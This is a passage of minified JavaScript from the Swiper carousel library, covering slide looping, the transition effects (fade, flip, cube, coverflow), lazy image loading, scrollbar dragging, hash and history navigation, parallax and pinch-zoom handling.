n=b.wrapper.children("."+b.params.slideClass);"auto"!==b.params.slidesPerView||b.params.loopedSlides||(b.params.loopedSlides=n.length),b.loopedSlides=parseInt(b.params.loopedSlides||b.params.slidesPerView,10),b.loopedSlides=b.loopedSlides+b.params.loopAdditionalSlides,b.loopedSlides>n.length&&(b.loopedSlides=n.length);var e,o=[],s=[];for(n.each(function(e,t){var i=D(this);e<b.loopedSlides&&s.push(t),e<n.length&&e>=n.length-b.loopedSlides&&o.push(t),i.attr("data-swiper-slide-index",e)}),e=0;e<s.length;e++)b.wrapper.append(D(s[e].cloneNode(!0)).addClass(b.params.slideDuplicateClass));for(e=o.length-1;0<=e;e--)b.wrapper.prepend(D(o[e].cloneNode(!0)).addClass(b.params.slideDuplicateClass))},b.destroyLoop=function(){b.wrapper.children("."+b.params.slideClass+"."+b.params.slideDuplicateClass).remove(),b.slides.removeAttr("data-swiper-slide-index")},b.reLoop=function(e){var t=b.activeIndex-b.loopedSlides;b.destroyLoop(),b.createLoop(),b.updateSlidesSize(),e&&b.slideTo(t+b.loopedSlides,0,!1)},b.fixLoop=function(){var e;b.activeIndex<b.loopedSlides?(e=b.slides.length-3*b.loopedSlides+b.activeIndex,e+=b.loopedSlides,b.slideTo(e,0,!1,!0)):("auto"===b.params.slidesPerView&&b.activeIndex>=2*b.loopedSlides||b.activeIndex>b.slides.length-2*b.params.slidesPerView)&&(e=-b.slides.length+b.activeIndex+b.loopedSlides,e+=b.loopedSlides,b.slideTo(e,0,!1,!0))},b.appendSlide=function(e){if(b.params.loop&&b.destroyLoop(),"object"==typeof e&&e.length)for(var t=0;t<e.length;t++)e[t]&&b.wrapper.append(e[t]);else b.wrapper.append(e);b.params.loop&&b.createLoop(),b.params.observer&&b.support.observer||b.update(!0)},b.prependSlide=function(e){b.params.loop&&b.destroyLoop();var t=b.activeIndex+1;if("object"==typeof e&&e.length){for(var i=0;i<e.length;i++)e[i]&&b.wrapper.prepend(e[i]);t=b.activeIndex+e.length}else b.wrapper.prepend(e);b.params.loop&&b.createLoop(),b.params.observer&&b.support.observer||b.update(!0),b.slideTo(t,0,!1)},b.removeSlide=function(e){b.params.loop&&(b.destroyLoop(),b.slides=b.wrapper.children("."+b.params.slideClass));var t,i=b.activeIndex;if("object"==typeof e&&e.length){for(var n=0;n<e.length;n++)t=e[n],b.slides[t]&&b.slides.eq(t).remove(),t<i&&i--;i=Math.max(i,0)}else t=e,b.slides[t]&&b.slides.eq(t).remove(),t<i&&i--,i=Math.max(i,0);b.params.loop&&b.createLoop(),b.params.observer&&b.support.observer||b.update(!0),b.params.loop?b.slideTo(i+b.loopedSlides,0,!1):b.slideTo(i,0,!1)},b.removeAllSlides=function(){for(var e=[],t=0;t<b.slides.length;t++)e.push(t);b.removeSlide(e)},b.effects={fade:{setTranslate:function(){for(var e=0;e<b.slides.length;e++){var t=b.slides.eq(e),i=-t[0].swiperSlideOffset;b.params.virtualTranslate||(i-=b.translate);var n=0;b.isHorizontal()||(n=i,i=0);var o=b.params.fade.crossFade?Math.max(1-Math.abs(t[0].progress),0):1+Math.min(Math.max(t[0].progress,-1),0);t.css({opacity:o}).transform("translate3d("+i+"px, "+n+"px, 0px)")}},setTransition:function(e){if(b.slides.transition(e),b.params.virtualTranslate&&0!==e){var i=!1;b.slides.transitionEnd(function(){if(!i&&b){i=!0,b.animating=!1;for(var e=["webkitTransitionEnd","transitionend","oTransitionEnd","MSTransitionEnd","msTransitionEnd"],t=0;t<e.length;t++)b.wrapper.trigger(e[t])}})}}},flip:{setTranslate:function(){for(var e=0;e<b.slides.length;e++){var t=b.slides.eq(e),i=t[0].progress;b.params.flip.limitRotation&&(i=Math.max(Math.min(t[0].progress,1),-1));var n=-180*i,o=0,s=-t[0].swiperSlideOffset,a=0;if(b.isHorizontal()?b.rtl&&(n=-n):(a=s,o=-n,n=s=0),t[0].style.zIndex=-Math.abs(Math.round(i))+b.slides.length,b.params.flip.slideShadows){var r=b.isHorizontal()?t.find(".swiper-slide-shadow-left"):t.find(".swiper-slide-shadow-top"),l=b.isHorizontal()?t.find(".swiper-slide-shadow-right"):t.find(".swiper-slide-shadow-bottom");0===r.length&&(r=D('<div class="swiper-slide-shadow-'+(b.isHorizontal()?"left":"top")+'"></div>'),t.append(r)),0===l.length&&(l=D('<div class="swiper-slide-shadow-'+(b.isHorizontal()?"right":"bottom")+'"></div>'),t.append(l)),r.length&&(r[0].style.opacity=Math.max(-i,0)),l.length&&(l[0].style.opacity=Math.max(i,0))}t.transform("translate3d("+s+"px, "+a+"px, 0px) rotateX("+o+"deg) rotateY("+n+"deg)")}},setTransition:function(e){if(b.slides.transition(e).find(".swiper-slide-shadow-top, .swiper-slide-shadow-right, .swiper-slide-shadow-bottom, .swiper-slide-shadow-left").transition(e),b.params.virtualTranslate&&0!==e){var i=!1;b.slides.eq(b.activeIndex).transitionEnd(function(){if(!i&&b&&D(this).hasClass(b.params.slideActiveClass)){i=!0,b.animating=!1;for(var e=["webkitTransitionEnd","transitionend","oTransitionEnd","MSTransitionEnd","msTransitionEnd"],t=0;t<e.length;t++)b.wrapper.trigger(e[t])}})}}},cube:{setTranslate:function(){var e,t=0;b.params.cube.shadow&&(b.isHorizontal()?(0===(e=b.wrapper.find(".swiper-cube-shadow")).length&&(e=D('<div class="swiper-cube-shadow"></div>'),b.wrapper.append(e)),e.css({height:b.width+"px"})):0===(e=b.container.find(".swiper-cube-shadow")).length&&(e=D('<div class="swiper-cube-shadow"></div>'),b.container.append(e)));for(var i=0;i<b.slides.length;i++){var n=b.slides.eq(i),o=90*i,s=Math.floor(o/360);b.rtl&&(o=-o,s=Math.floor(-o/360));var a=Math.max(Math.min(n[0].progress,1),-1),r=0,l=0,c=0;i%4==0?(r=4*-s*b.size,c=0):(i-1)%4==0?(r=0,c=4*-s*b.size):(i-2)%4==0?(r=b.size+4*s*b.size,c=b.size):(i-3)%4==0&&(r=-b.size,c=3*b.size+4*b.size*s),b.rtl&&(r=-r),b.isHorizontal()||(l=r,r=0);var u="rotateX("+(b.isHorizontal()?0:-o)+"deg) rotateY("+(b.isHorizontal()?o:0)+"deg) translate3d("+r+"px, "+l+"px, "+c+"px)";if(a<=1&&-1<a&&(t=90*i+90*a,b.rtl&&(t=90*-i-90*a)),n.transform(u),b.params.cube.slideShadows){var d=b.isHorizontal()?n.find(".swiper-slide-shadow-left"):n.find(".swiper-slide-shadow-top"),h=b.isHorizontal()?n.find(".swiper-slide-shadow-right"):n.find(".swiper-slide-shadow-bottom");0===d.length&&(d=D('<div class="swiper-slide-shadow-'+(b.isHorizontal()?"left":"top")+'"></div>'),n.append(d)),0===h.length&&(h=D('<div class="swiper-slide-shadow-'+(b.isHorizontal()?"right":"bottom")+'"></div>'),n.append(h)),d.length&&(d[0].style.opacity=Math.max(-a,0)),h.length&&(h[0].style.opacity=Math.max(a,0))}}if(b.wrapper.css({"-webkit-transform-origin":"50% 50% -"+b.size/2+"px","-moz-transform-origin":"50% 50% -"+b.size/2+"px","-ms-transform-origin":"50% 50% -"+b.size/2+"px","transform-origin":"50% 50% -"+b.size/2+"px"}),b.params.cube.shadow)if(b.isHorizontal())e.transform("translate3d(0px, "+(b.width/2+b.params.cube.shadowOffset)+"px, "+-b.width/2+"px) rotateX(90deg) rotateZ(0deg) scale("+b.params.cube.shadowScale+")");else{var p=Math.abs(t)-90*Math.floor(Math.abs(t)/90),f=1.5-(Math.sin(2*p*Math.PI/360)/2+Math.cos(2*p*Math.PI/360)/2),m=b.params.cube.shadowScale,g=b.params.cube.shadowScale/f,v=b.params.cube.shadowOffset;e.transform("scale3d("+m+", 1, "+g+") translate3d(0px, "+(b.height/2+v)+"px, "+-b.height/2/g+"px) rotateX(-90deg)")}var y=b.isSafari||b.isUiWebView?-b.size/2:0;b.wrapper.transform("translate3d(0px,0,"+y+"px) rotateX("+(b.isHorizontal()?0:t)+"deg) rotateY("+(b.isHorizontal()?-t:0)+"deg)")},setTransition:function(e){b.slides.transition(e).find(".swiper-slide-shadow-top, .swiper-slide-shadow-right, .swiper-slide-shadow-bottom, .swiper-slide-shadow-left").transition(e),b.params.cube.shadow&&!b.isHorizontal()&&b.container.find(".swiper-cube-shadow").transition(e)}},coverflow:{setTranslate:function(){for(var e=b.translate,t=b.isHorizontal()?-e+b.width/2:-e+b.height/2,i=b.isHorizontal()?b.params.coverflow.rotate:-b.params.coverflow.rotate,n=b.params.coverflow.depth,o=0,s=b.slides.length;o<s;o++){var a=b.slides.eq(o),r=b.slidesSizesGrid[o],l=(t-a[0].swiperSlideOffset-r/2)/r*b.params.coverflow.modifier,c=b.isHorizontal()?i*l:0,u=b.isHorizontal()?0:i*l,d=-n*Math.abs(l),h=b.isHorizontal()?0:b.params.coverflow.stretch*l,p=b.isHorizontal()?b.params.coverflow.stretch*l:0;Math.abs(p)<.001&&(p=0),Math.abs(h)<.001&&(h=0),Math.abs(d)<.001&&(d=0),Math.abs(c)<.001&&(c=0),Math.abs(u)<.001&&(u=0);var f="translate3d("+p+"px,"+h+"px,"+d+"px) rotateX("+u+"deg) rotateY("+c+"deg)";if(a.transform(f),a[0].style.zIndex=1-Math.abs(Math.round(l)),b.params.coverflow.slideShadows){var m=b.isHorizontal()?a.find(".swiper-slide-shadow-left"):a.find(".swiper-slide-shadow-top"),g=b.isHorizontal()?a.find(".swiper-slide-shadow-right"):a.find(".swiper-slide-shadow-bottom");0===m.length&&(m=D('<div class="swiper-slide-shadow-'+(b.isHorizontal()?"left":"top")+'"></div>'),a.append(m)),0===g.length&&(g=D('<div class="swiper-slide-shadow-'+(b.isHorizontal()?"right":"bottom")+'"></div>'),a.append(g)),m.length&&(m[0].style.opacity=0<l?l:0),g.length&&(g[0].style.opacity=0<-l?-l:0)}}b.browser.ie&&(b.wrapper[0].style.perspectiveOrigin=t+"px 50%")},setTransition:function(e){b.slides.transition(e).find(".swiper-slide-shadow-top, .swiper-slide-shadow-right, .swiper-slide-shadow-bottom, .swiper-slide-shadow-left").transition(e)}}},b.lazy={initialImageLoaded:!1,loadImageInSlide:function(e,l){if(void 0!==e&&(void 0===l&&(l=!0),0!==b.slides.length)){var c=b.slides.eq(e),t=c.find("."+b.params.lazyLoadingClass+":not(."+b.params.lazyStatusLoadedClass+"):not(."+b.params.lazyStatusLoadingClass+")");!c.hasClass(b.params.lazyLoadingClass)||c.hasClass(b.params.lazyStatusLoadedClass)||c.hasClass(b.params.lazyStatusLoadingClass)||(t=t.add(c[0])),0!==t.length&&t.each(function(){var n=D(this);n.addClass(b.params.lazyStatusLoadingClass);var o=n.attr("data-background"),s=n.attr("data-src"),a=n.attr("data-srcset"),r=n.attr("data-sizes");b.loadImage(n[0],s||o,a,r,!1,function(){if(o?(n.css("background-image",'url("'+o+'")'),n.removeAttr("data-background")):(a&&(n.attr("srcset",a),n.removeAttr("data-srcset")),r&&(n.attr("sizes",r),n.removeAttr("data-sizes")),s&&(n.attr("src",s),n.removeAttr("data-src"))),n.addClass(b.params.lazyStatusLoadedClass).removeClass(b.params.lazyStatusLoadingClass),c.find("."+b.params.lazyPreloaderClass+", ."+b.params.preloaderClass).remove(),b.params.loop&&l){var e=c.attr("data-swiper-slide-index");if(c.hasClass(b.params.slideDuplicateClass)){var t=b.wrapper.children('[data-swiper-slide-index="'+e+'"]:not(.'+b.params.slideDuplicateClass+")");b.lazy.loadImageInSlide(t.index(),!1)}else{var i=b.wrapper.children("."+b.params.slideDuplicateClass+'[data-swiper-slide-index="'+e+'"]');b.lazy.loadImageInSlide(i.index(),!1)}}b.emit("onLazyImageReady",b,c[0],n[0])}),b.emit("onLazyImageLoad",b,c[0],n[0])})}},load:function(){var e,t=b.params.slidesPerView;if("auto"===t&&(t=0),b.lazy.initialImageLoaded||(b.lazy.initialImageLoaded=!0),b.params.watchSlidesVisibility)b.wrapper.children("."+b.params.slideVisibleClass).each(function(){b.lazy.loadImageInSlide(D(this).index())});else if(1<t)for(e=b.activeIndex;e<b.activeIndex+t;e++)b.slides[e]&&b.lazy.loadImageInSlide(e);else b.lazy.loadImageInSlide(b.activeIndex);if(b.params.lazyLoadingInPrevNext)if(1<t||b.params.lazyLoadingInPrevNextAmount&&1<b.params.lazyLoadingInPrevNextAmount){var i=b.params.lazyLoadingInPrevNextAmount,n=t,o=Math.min(b.activeIndex+n+Math.max(i,n),b.slides.length),s=Math.max(b.activeIndex-Math.max(n,i),0);for(e=b.activeIndex+t;e<o;e++)b.slides[e]&&b.lazy.loadImageInSlide(e);for(e=s;e<b.activeIndex;e++)b.slides[e]&&b.lazy.loadImageInSlide(e)}else{var a=b.wrapper.children("."+b.params.slideNextClass);0<a.length&&b.lazy.loadImageInSlide(a.index());var r=b.wrapper.children("."+b.params.slidePrevClass);0<r.length&&b.lazy.loadImageInSlide(r.index())}},onTransitionStart:function(){b.params.lazyLoading&&(b.params.lazyLoadingOnTransitionStart||!b.params.lazyLoadingOnTransitionStart&&!b.lazy.initialImageLoaded)&&b.lazy.load()},onTransitionEnd:function(){b.params.lazyLoading&&!b.params.lazyLoadingOnTransitionStart&&b.lazy.load()}},b.scrollbar={isTouched:!1,setDragPosition:function(e){var t=b.scrollbar,i=(b.isHorizontal()?"touchstart"===e.type||"touchmove"===e.type?e.targetTouches[0].pageX:e.pageX||e.clientX:"touchstart"===e.type||"touchmove"===e.type?e.targetTouches[0].pageY:e.pageY||e.clientY)-t.track.offset()[b.isHorizontal()?"left":"top"]-t.dragSize/2,n=-b.minTranslate()*t.moveDivider,o=-b.maxTranslate()*t.moveDivider;i<n?i=n:o<i&&(i=o),i=-i/t.moveDivider,b.updateProgress(i),b.setWrapperTranslate(i,!0)},dragStart:function(e){var t=b.scrollbar;t.isTouched=!0,e.preventDefault(),e.stopPropagation(),t.setDragPosition(e),clearTimeout(t.dragTimeout),t.track.transition(0),b.params.scrollbarHide&&t.track.css("opacity",1),b.wrapper.transition(100),t.drag.transition(100),b.emit("onScrollbarDragStart",b)},dragMove:function(e){var t=b.scrollbar;t.isTouched&&(e.preventDefault?e.preventDefault():e.returnValue=!1,t.setDragPosition(e),b.wrapper.transition(0),t.track.transition(0),t.drag.transition(0),b.emit("onScrollbarDragMove",b))},dragEnd:function(e){var t=b.scrollbar;t.isTouched&&(t.isTouched=!1,b.params.scrollbarHide&&(clearTimeout(t.dragTimeout),t.dragTimeout=setTimeout(function(){t.track.css("opacity",0),t.track.transition(400)},1e3)),b.emit("onScrollbarDragEnd",b),b.params.scrollbarSnapOnRelease&&b.slideReset())},draggableEvents:!1!==b.params.simulateTouch||b.support.touch?b.touchEvents:b.touchEventsDesktop,enableDraggable:function(){var e=b.scrollbar,t=b.support.touch?e.track:document;D(e.track).on(e.draggableEvents.start,e.dragStart),D(t).on(e.draggableEvents.move,e.dragMove),D(t).on(e.draggableEvents.end,e.dragEnd)},disableDraggable:function(){var e=b.scrollbar,t=b.support.touch?e.track:document;D(e.track).off(b.draggableEvents.start,e.dragStart),D(t).off(b.draggableEvents.move,e.dragMove),D(t).off(b.draggableEvents.end,e.dragEnd)},set:function(){if(b.params.scrollbar){var e=b.scrollbar;e.track=D(b.params.scrollbar),b.params.uniqueNavElements&&"string"==typeof b.params.scrollbar&&1<e.track.length&&1===b.container.find(b.params.scrollbar).length&&(e.track=b.container.find(b.params.scrollbar)),e.drag=e.track.find(".swiper-scrollbar-drag"),0===e.drag.length&&(e.drag=D('<div class="swiper-scrollbar-drag"></div>'),e.track.append(e.drag)),e.drag[0].style.width="",e.drag[0].style.height="",e.trackSize=b.isHorizontal()?e.track[0].offsetWidth:e.track[0].offsetHeight,e.divider=b.size/b.virtualSize,e.moveDivider=e.divider*(e.trackSize/b.size),e.dragSize=e.trackSize*e.divider,b.isHorizontal()?e.drag[0].style.width=e.dragSize+"px":e.drag[0].style.height=e.dragSize+"px",1<=e.divider?e.track[0].style.display="none":e.track[0].style.display="",b.params.scrollbarHide&&(e.track[0].style.opacity=0)}},setTranslate:function(){if(b.params.scrollbar){var e,t=b.scrollbar,i=(b.translate,t.dragSize);e=(t.trackSize-t.dragSize)*b.progress,b.rtl&&b.isHorizontal()?0<(e=-e)?(i=t.dragSize-e,e=0):-e+t.dragSize>t.trackSize&&(i=t.trackSize+e):e<0?(i=t.dragSize+e,e=0):e+t.dragSize>t.trackSize&&(i=t.trackSize-e),b.isHorizontal()?(b.support.transforms3d?t.drag.transform("translate3d("+e+"px, 0, 0)"):t.drag.transform("translateX("+e+"px)"),t.drag[0].style.width=i+"px"):(b.support.transforms3d?t.drag.transform("translate3d(0px, "+e+"px, 0)"):t.drag.transform("translateY("+e+"px)"),t.drag[0].style.height=i+"px"),b.params.scrollbarHide&&(clearTimeout(t.timeout),t.track[0].style.opacity=1,t.timeout=setTimeout(function(){t.track[0].style.opacity=0,t.track.transition(400)},1e3))}},setTransition:function(e){b.params.scrollbar&&b.scrollbar.drag.transition(e)}},b.controller={LinearSpline:function(e,t){var i,n;this.x=e,this.y=t,this.lastIndex=e.length-1;this.x.length;this.interpolate=function(e){return e?(n=r(this.x,e),i=n-1,(e-this.x[i])*(this.y[n]-this.y[i])/(this.x[n]-this.x[i])+this.y[i]):0};var o,s,a,r=function(e,t){for(s=-1,o=e.length;1<o-s;)e[a=o+s>>1]<=t?s=a:o=a;return o}},getInterpolateFunction:function(e){b.controller.spline||(b.controller.spline=b.params.loop?new b.controller.LinearSpline(b.slidesGrid,e.slidesGrid):new b.controller.LinearSpline(b.snapGrid,e.snapGrid))},setTranslate:function(t,e){function i(e){t=e.rtl&&"horizontal"===e.params.direction?-b.translate:b.translate,"slide"===b.params.controlBy&&(b.controller.getInterpolateFunction(e),o=-b.controller.spline.interpolate(-t)),o&&"container"!==b.params.controlBy||(n=(e.maxTranslate()-e.minTranslate())/(b.maxTranslate()-b.minTranslate()),o=(t-b.minTranslate())*n+e.minTranslate()),b.params.controlInverse&&(o=e.maxTranslate()-o),e.updateProgress(o),e.setWrapperTranslate(o,!1,b),e.updateActiveIndex()}var n,o,s=b.params.control;if(b.isArray(s))for(var a=0;a<s.length;a++)s[a]!==e&&s[a]instanceof H&&i(s[a]);else s instanceof H&&e!==s&&i(s)},setTransition:function(t,e){function i(e){e.setWrapperTransition(t,b),0!==t&&(e.onTransitionStart(),e.wrapper.transitionEnd(function(){o&&(e.params.loop&&"slide"===b.params.controlBy&&e.fixLoop(),e.onTransitionEnd())}))}var n,o=b.params.control;if(b.isArray(o))for(n=0;n<o.length;n++)o[n]!==e&&o[n]instanceof H&&i(o[n]);else o instanceof H&&e!==o&&i(o)}},b.hashnav={onHashCange:function(e,t){var i=document.location.hash.replace("#","");i!==b.slides.eq(b.activeIndex).attr("data-hash")&&b.slideTo(b.wrapper.children("."+b.params.slideClass+'[data-hash="'+i+'"]').index())},attachEvents:function(e){var t=e?"off":"on";D(window)[t]("hashchange",b.hashnav.onHashCange)},setHash:function(){if(b.hashnav.initialized&&b.params.hashnav)if(b.params.replaceState&&window.history&&window.history.replaceState)window.history.replaceState(null,null,"#"+b.slides.eq(b.activeIndex).attr("data-hash")||"");else{var e=b.slides.eq(b.activeIndex),t=e.attr("data-hash")||e.attr("data-history");document.location.hash=t||""}},init:function(){if(b.params.hashnav&&!b.params.history){b.hashnav.initialized=!0;var e=document.location.hash.replace("#","");if(e){for(var t=0,i=b.slides.length;t<i;t++){var n=b.slides.eq(t);if((n.attr("data-hash")||n.attr("data-history"))===e&&!n.hasClass(b.params.slideDuplicateClass)){var o=n.index();b.slideTo(o,0,b.params.runCallbacksOnInit,!0)}}b.params.hashnavWatchState&&b.hashnav.attachEvents()}}},destroy:function(){b.params.hashnavWatchState&&b.hashnav.attachEvents(!0)}},b.history={init:function(){if(b.params.history){if(!window.history||!window.history.pushState)return b.params.history=!1,void(b.params.hashnav=!0);b.history.initialized=!0,this.paths=this.getPathValues(),(this.paths.key||this.paths.value)&&(this.scrollToSlide(0,this.paths.value,b.params.runCallbacksOnInit),b.params.replaceState||window.addEventListener("popstate",this.setHistoryPopState))}},setHistoryPopState:function(){b.history.paths=b.history.getPathValues(),b.history.scrollToSlide(b.params.speed,b.history.paths.value,!1)},getPathValues:function(){var e=window.location.pathname.slice(1).split("/"),t=e.length;return{key:e[t-2],value:e[t-1]}},setHistory:function(e,t){if(b.history.initialized&&b.params.history){var i=b.slides.eq(t),n=this.slugify(i.attr("data-history"));window.location.pathname.includes(e)||(n=e+"/"+n),b.params.replaceState?window.history.replaceState(null,null,n):window.history.pushState(null,null,n)}},slugify:function(e){return e.toString().toLowerCase().replace(/\s+/g,"-").replace(/[^\w\-]+/g,"").replace(/\-\-+/g,"-").replace(/^-+/,"").replace(/-+$/,"")},scrollToSlide:function(e,t,i){if(t)for(var n=0,o=b.slides.length;n<o;n++){var s=b.slides.eq(n);if(this.slugify(s.attr("data-history"))===t&&!s.hasClass(b.params.slideDuplicateClass)){var a=s.index();b.slideTo(a,e,i)}}else b.slideTo(0,e,i)}},b.disableKeyboardControl=function(){b.params.keyboardControl=!1,D(document).off("keydown",n)},b.enableKeyboardControl=function(){b.params.keyboardControl=!0,D(document).on("keydown",n)},b.mousewheel={event:!1,lastScrollTime:(new window.Date).getTime()},b.params.mousewheelControl&&(b.mousewheel.event=-1<navigator.userAgent.indexOf("firefox")?"DOMMouseScroll":function(){var e="onwheel",t=e in document;if(!t){var i=document.createElement("div");i.setAttribute(e,"return;"),t="function"==typeof i[e]}return!t&&document.implementation&&document.implementation.hasFeature&&!0!==document.implementation.hasFeature("","")&&(t=document.implementation.hasFeature("Events.wheel","3.0")),t}()?"wheel":"mousewheel"),b.disableMousewheelControl=function(){if(!b.mousewheel.event)return!1;var e=b.container;return"container"!==b.params.mousewheelEventsTarged&&(e=D(b.params.mousewheelEventsTarged)),e.off(b.mousewheel.event,o),!0},b.enableMousewheelControl=function(){if(!b.mousewheel.event)return!1;var e=b.container;return"container"!==b.params.mousewheelEventsTarged&&(e=D(b.params.mousewheelEventsTarged)),e.on(b.mousewheel.event,o),!0},b.parallax={setTranslate:function(){b.container.children("[data-swiper-parallax], [data-swiper-parallax-x], [data-swiper-parallax-y]").each(function(){s(this,b.progress)}),b.slides.each(function(){var e=D(this);e.find("[data-swiper-parallax], [data-swiper-parallax-x], [data-swiper-parallax-y]").each(function(){s(this,Math.min(Math.max(e[0].progress,-1),1))})})},setTransition:function(i){void 0===i&&(i=b.params.speed),b.container.find("[data-swiper-parallax], [data-swiper-parallax-x], [data-swiper-parallax-y]").each(function(){var e=D(this),t=parseInt(e.attr("data-swiper-parallax-duration"),10)||i;0===i&&(t=0),e.transition(t)})}},b.zoom={scale:1,currentScale:1,isScaling:!1,gesture:{slide:void 0,slideWidth:void 0,slideHeight:void 0,image:void 0,imageWrap:void 0,zoomMax:b.params.zoomMax},image:{isTouched:void 0,isMoved:void 0,currentX:void 0,currentY:void 0,minX:void 0,minY:void 0,maxX:void 0,maxY:void 0,width:void 0,height:void 0,startX:void 0,startY:void 0,touchesStart:{},touchesCurrent:{}},velocity:{x:void 0,y:void 0,prevPositionX:void 0,prevPositionY:void 0,prevTime:void 0},getDistanceBetweenTouches:function(e){if(e.targetTouches.length<2)return 1;var t=e.targetTouches[0].pageX,i=e.targetTouches[0].pageY,n=e.targetTouches[1].pageX,o=e.targetTouches[1].pageY;return Math.sqrt(Math.pow(n-t,2)+Math.pow(o-i,2))},onGestureStart:function(e){var t=b.zoom;if(!b.support.gestures){if("touchstart"!==e.type||"touchstart"===e.type&&e.targetTouches.length<2)return;t.gesture.scaleStart=t.getDistanceBetweenTouches(e)}t.gesture.slide&&t.gesture.slide.length||(t.gesture.slide=D(this),0===t.gesture.slide.length&&(t.gesture.slide=b.slides.eq(b.activeIndex)),t.gesture.image=t.gesture.slide.find("img, svg, canvas"),t.gesture.imageWrap=t.gesture.image.parent("."+b.params.zoomContainerClass),t.gesture.zoomMax=t.gesture.imageWrap.attr("data-swiper-zoom")||b.params.zoomMax,0!==t.gesture.imageWrap.length)?(t.gesture.image.transition(0),t.isScaling=!0):t.gesture.image=void 0},onGestureChange:function(e){var t=b.zoom;if(!b.support.gestures){if("touchmove"!==e.type||"touchmove"===e.type&&e.targetTouches.length<2)return;t.gesture.scaleMove=t.getDistanceBetweenTouches(e)}t.gesture.image&&0!==t.gesture.image.length&&(b.support.gestures?t.scale=e.scale*t.currentScale:t.scale=t.gesture.scaleMove/t.gesture.scaleStart*t.currentScale,t.scale>t.gesture.zoomMax&&(t.scale=t.gesture.zoomMax-1+Math.pow(t.scale-t.gesture.zoomMax+1,.5)),t.scale<b.params.zoomMin&&(t.scale=b.params.zoomMin+1-Math.pow(b.params.zoomMin-t.scale+1,.5)),t.gesture.image.transform("translate3d(0,0,0) scale("+t.scale+")"))},onGestureEnd:function(e){var t=b.zoom;!b.support.gestures&&("touchend"!==e.type||"touchend"===e.type&&e.changedTouches.length<2)||t.gesture.image&&0!==t.gesture.image.length&&(t.scale=Math.max(Math.min(t.scale,t.gesture.zoomMax),b.params.zoomMin),t.gesture.image.transition(b.params.speed).transform("translate3d(0,0,0) scale("+t.scale+")"),t.currentScale=t.scale,t.isScaling=!1,1===t.scale&&(t.gesture.slide=void 0))},onTouchStart:function(e,t){var i=e.zoom;i.gesture.image&&0!==i.gesture.image.length&&(i.image.isTouched||("android"===e.device.os&&t.preventDefault(),i.image.isTouched=!0,i.image.touchesStart.x="touchstart"===t.type?t.targetTouches[0].pageX:t.pageX,i.image.touchesStart.y="touchstart"===t.type?t.targetTouches[0].pageY:t.pageY))},onTouchMove:function(e){var t=b.zoom;if(t.gesture.image&&0!==t.gesture.image.length&&(b.allowClick=!1,t.image.isTouched&&t.gesture.slide)){t.image.isMoved||(t.image.width=t.gesture.image[0].offsetWidth,t.image.height=t.gesture.image[0].offsetHeight,t.image.startX=b.getTranslate(t.gesture.imageWrap[0],"x")||0,t.image.startY=b.getTranslate(t.gesture.imageWrap[0],"y")||0,t.gesture.slideWidth=t.gesture.slide[0].offsetWidth,t.gesture.slideHeight=t.gesture.slide[0].offsetHeight,t.gesture.imageWrap.transition(0));var i=t.image.width*t.scale,n=t.image.height*t.scale;if(!(i<t.gesture.slideWidth&&n<t.gesture.slideHeight)){if(t.image.minX=Math.min(t.gesture.slideWidth/2-i/2,0),t.image.maxX=-t.image.minX,t.image.minY=Math.min(t.gesture.slideHeight/2-n/2,0),t.image.maxY=-t.image.minY,t.image.touchesCurrent.x="touchmove"===e.type?e.targetTouches[0].pageX:e.pageX,t.image.touchesCurrent.y="touchmove"===e.type?e.targetTouches[0].pageY:e.pageY,!t.image.isMoved&&!t.isScaling){if(b.isHorizontal()&&Math.floor(t.image.minX)===Math.floor(t.image.startX)&&t.image.touchesCurrent.x<t.image.touchesStart.x||Math.floor(t.image.maxX)===Math.floor(t.image.startX)&&t.image.touchesCurrent.x>t.image.touchesStart.x)return void(t.image.isTouched=!1);if(!b.isHorizontal()&&Math.floor(t.image.minY)===Math.floor(t.image.startY)&&t.image.touchesCurrent.y<t.image.touchesStart.y||Math.floor(t.image.maxY)===Math.floor(t.image.startY)&&t.image.touchesCurrent.y>t.image.touchesStart.y)return void(t.image.isTouched=!1)}e.preventDefault(),e.stopPropagation(),t.image.isMoved=!0,t.image.currentX=t.image.touchesCurrent.x-t.image.touchesStart.x+t.image.startX,t.image.currentY=t.image.touchesCurrent.y-t.image.touchesStart.y+t.image.startY,t.image.currentX<t.image.minX&&(t.image.currentX=t.image.minX+1-Math.pow(t.image.minX-t.image.currentX+1,.8)),t.image.currentX>t.image.maxX&&(t.image.currentX=t.image.maxX-1+Math.pow(t.image.currentX-t.image.maxX+1,.8)),t.image.currentY<t.image.minY&&(t.image.currentY=t.image.minY+1-Math.pow(t.image.minY-t.image.currentY+1,.8)),t.image.currentY>t.image.maxY&&(t.image.currentY=t.image.maxY-1+Math.pow(t.image.currentY-t.image.maxY+1,.8)),t.velocity.prevPositionX||(t.velocity.prevPositionX=t.image.touchesCurrent.x),t.velocity.prevPositionY||(t.velocity.prevPositionY=t.image.touchesCurrent.y),t.velocity.prevTime||(t.velocity.prevTime=Date.now()),t.velocity.x=(t.image.touchesCurrent.x-t.velocity.prevPositionX)/(Date.now()-t.velocity.prevTime)/2,t.velocity.y=(t.image.touchesCurrent.y-t.velocity.prevPositionY)/(Date.now()-t.velocity.prevTime)/2,Math.abs(t.image.touchesCurrent.x-t.velocity.prevPositionX)<2&&(t.velocity.x=0),Math.abs(t.image.touchesCurrent.y-t.velocity.prevPositionY)<2&&(t.velocity.y=0),t.velocity.prevPositionX=t.image.touchesCurrent.x,t.velocity.prevPositionY=t.image.touchesCurrent.y,t.velocity.prevTime=Date.now(),t.gesture.imageWrap.transform("translate3d("+t.image.currentX+"px, "+t.image.currentY+"px,0)")}}},onTouchEnd:function(e,t){var i=e.zoom;if(i.gesture.image&&0!==i.gesture.image.length){if(!i.image.isTouched||!i.image.isMoved)return i.image.isTouched=!1,void(i.image.isMoved=!1);i.image.isTouched=!1,i.image.isMoved=!1;var n=300,o=300,s=i.velocity.x*n,a=i.image.currentX+s,r=i.velocity.y*o,l=i.image.currentY+r;0!==i.velocity.x&&(n=Math.abs((a-i.image.currentX)/i.velocity.x)),0!==i.velocity.y&&(o=Math.abs((l-i.image.currentY)/i.velocity.y));var c=Math.max(n,o);i.image.currentX=a,i.image.currentY=l;var 